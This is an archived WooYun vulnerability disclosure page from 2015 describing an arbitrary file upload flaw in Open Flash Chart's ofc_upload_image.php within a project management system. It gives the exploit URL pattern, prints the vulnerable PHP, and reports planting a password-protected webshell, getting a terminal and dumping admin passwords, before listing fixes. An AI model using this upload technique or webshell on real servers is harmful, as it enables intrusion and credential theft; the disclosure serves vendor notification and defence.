乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-21: 细节已通知厂商并且等待厂商处理中 2015-08-24: 厂商已经确认,细节仅向厂商公开 2015-09-03: 细节向核心白帽子及相关领域专家公开 2015-09-13: 细节向普通白帽子公开 2015-09-23: 细节向实习白帽子公开 2015-10-08: 细节向公众公开
迂回提权
?>
POST 数据 文件执行任意后缀文件保存漏洞文件:/chart/php-ofc-library/ofc_upload_image.php 利用:/chart/libraries/ofc_upload_image.php?name=m7lrv.php m7lrv.php 文件名 Post任意数据保存位置http://localhost/chart/tmp-upload-images/m7lrv.php<?php //// In Open Flash Chart -> save_image debug mode, you// will see the 'echo' text in a new window.// /* print_r( $_GET );print_r( $_POST );print_r( $_FILES ); print_r( $GLOBALS );print_r( $GLOBALS["HTTP_RAW_POST_DATA"] ); */ // default path for the image to be stored //$default_path = '../tmp-upload-images/'; if (!file_exists($default_path)) mkdir($default_path, 0777, true); // full path to the saved image including filename //$destination = $default_path . basename( $_GET[ 'name' ] ); echo 'Saving your image to: '. $destination;// print_r( $_POST );// print_r( $_SERVER );// echo $HTTP_RAW_POST_DATA; //// POST data is usually string data, but we are passing a RAW .png// so PHP is a bit confused and $_POST is empty. But it has saved// the raw bits into $HTTP_RAW_POST_DATA// $jfh = fopen($destination, 'w') or die("can't open file");fwrite($jfh, $HTTP_RAW_POST_DATA);fclose($jfh); //// LOOK://exit(); //// PHP5:// // default path for the image to be stored //$default_path = 'tmp-upload-images/'; if (!file_exists($default_path)) mkdir($default_path, 0777, true); // full path to the saved image including filename //$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); // move the image into the specified directory //if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) { echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";} else { echo "FILE UPLOAD FAILED";} ?>
一句话:**.**.**.**/htdocs/dayrui/libraries/tmp-upload-images/m7lrv.php paswd:m7lrv
虚拟终端:
上传管理员用户明文神器:
连之:
1、更新WSS项目管理系统2、修改管理员密码3、配置服务器策略和文件夹权限
危害等级:中
漏洞Rank:6
确认时间:2015-08-24 08:32
通知用户处理中
暂无